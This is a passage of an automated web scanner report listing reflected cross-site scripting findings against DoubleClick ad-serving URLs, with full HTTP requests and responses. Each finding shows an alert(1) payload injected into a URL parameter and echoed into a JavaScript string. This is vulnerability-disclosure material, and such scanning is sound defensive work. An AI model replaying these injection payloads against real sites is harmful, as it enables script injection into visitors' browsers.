Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:33:39 GMT
Expires: Tue, 28 Jun 2011 02:33:39 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=926de"-alert(1)-"6a870769378http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner%26utm_campaign%3D5383603%26utm_content%3DZ10KP");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ef0"-alert(1)-"7fe67c3c10a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477c3ef0"-alert(1)-"7fe67c3c10a&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Date: Tue, 28 Jun 2011 02:32:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
"http://s0.2mdn.net/3094545/Chase_Sapphire_10k No Fee_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477c3ef0"-alert(1)-"7fe67c3c10a&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683c0"-alert(1)-"53404fc0cf5 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488683c0"-alert(1)-"53404fc0cf5&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:53 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488683c0"-alert(1)-"53404fc0cf5&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8295b"-alert(1)-"0063854f767 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=1125138295b"-alert(1)-"0063854f767&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:27 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=1125138295b"-alert(1)-"0063854f767&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e933c"-alert(1)-"2d7f11bea7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530e933c"-alert(1)-"2d7f11bea7&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6035
Date: Tue, 28 Jun 2011 02:28:19 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530e933c"-alert(1)-"2d7f11bea7&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var op
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189ae"-alert(1)-"2f1dc89c1e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&189ae"-alert(1)-"2f1dc89c1e3=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6051
Date: Tue, 28 Jun 2011 02:29:04 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
2%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&189ae"-alert(1)-"2f1dc89c1e3=1http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c64cb"-alert(1)-"4e5a87e0f7b was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=c64cb"-alert(1)-"4e5a87e0f7b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:28:41 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
42%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=c64cb"-alert(1)-"4e5a87e0f7bhttp://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d18"-alert(1)-"a23769c2b50 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=44035458360174204242d18"-alert(1)-"a23769c2b50&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:05 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=44035458360174204242d18"-alert(1)-"a23769c2b50&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519f1"-alert(1)-"cc5a0c33515 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488519f1"-alert(1)-"cc5a0c33515&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
